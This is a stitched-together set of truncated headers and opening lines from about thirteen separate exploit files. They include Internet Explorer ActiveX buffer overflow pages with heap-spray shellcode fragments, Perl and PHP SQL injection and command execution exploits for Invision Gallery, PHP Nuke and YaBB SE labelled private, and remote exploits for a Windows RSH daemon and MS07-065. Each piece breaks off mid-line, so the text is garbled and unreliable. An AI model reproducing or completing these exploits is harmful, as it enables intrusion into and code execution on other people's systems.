!-- ImageShack Toolbar 4.5.7 FileUploader Class (ImageShackToolbar.dll) insecure method poc This tool may allow a malicious web page to post arbitrary images on the web from a user hard drive. Images will be visible on ImageShack site, a way for an a
!-- Move Networks Upgrade Manager Control Buffer Overflow Exploit written by e.b. Tested on Windows XP SP2(fully patched) English, IE6, QMPUpgrade.dll version 1.0.0.1 Thanks to h.d.m. and the Metasploit crew -- html head titleMove Networks Upgrade Ma
htmlbodyscript function Demo() { var shellcode; var addr; var fill; alert('attempting a crash!'); shellcode = unescape('%u0c0c'); fill = unescape('%ucccc'); addr = 0x02020202; var b = fill; while (b.length = 0x40000) b+=b; var c = new Array(); for (v
!-- Comodo AntiVirus 2.0 ExecuteStr() 0day Remote Command Execution Exploit Bug discovered by Krystian Kloskowski (h07) h07@interia.pl Tested on:.. - Comodo AntiVirus Beta 2.0 - Microsoft Internet Explorer 6 Just for fun ;) -- html object id=obj clas
!-- Lycos FileUploader Control Buffer Overflow Exploit written by e.b. Note: If IE doesn't crash, the shellcode will get executed when IE is closed. Tested on Windows XP SP2(fully patched) English, IE6, FileUploader.dll version 2.0.0.2 Thanks to h.d.
#!/usr/bin/perl ## Invision Gallery version = 2.0.7 sql injection exploit ## (c)oded by 1dt.w0lf ## RST/GHC ## THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE ## KEEP IT PRIVATE use Tk; use Tk::BrowseEntry; use Tk::DialogBox; use LWP::UserAgent; $mw = new M
?php ########################################################## # UNPUBLISHED RST/GHC EXPLOIT # PHP Nuke `sid` sql injection exploit for Search module # POST method - # the best for version 8.0 FINAL # (c)oded by Foster 1dt.w0lf #####################
#!/usr/bin/perl ## YaBB SE version = 1.5.5 commands execution exploit by RST/GHC ## GUI version =))) ## ## THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE ## KEEP IT PRIVATE ## ## (c)oded by 1dt.w0lf ## http://rst.void.ru ## http://ghc.ru use Tk; use Tk::Me
!-- HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit written by e.b. Note that I did not have time to work out some heap fragmentation issues so this code is NOT reliable... Tested on Windows XP SP2(fully patched) English, IE6, hpvirtu
/* Windows RSH daemon =1.8 remote exploit * ======================================= * rshd is a multithreaded daemon service that listens for connections on port 514 * (tcp port for the shell/cmd protocol), runs commands passed by clients and sends
/* Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) Mod of axis's code. CHANGELOG - added dnsname as a parameter, before it was hardcoded in the request data. (Marcin Kozlowski) Provided for legal security research and testing purpos
!-- Digital Data Communications RtspVaPgCtrl Class (RtspVapgDecoder.dll 1.1.0.29) remote buffer overflow (ie7/xp sp2) You may ask why I'm interested in theese untested/unpatched codecs, oh, well, I'm preparing a live scanner for clsid's, I mean not a
BitTorrent and UTorrent Peers Static Overflow ------------------------------------------------------------------------ SUMMARY http://www.bittorrent.com BitTorrent and http://www.utorrent.com uTorrent are the most used clients for the bittorrent pro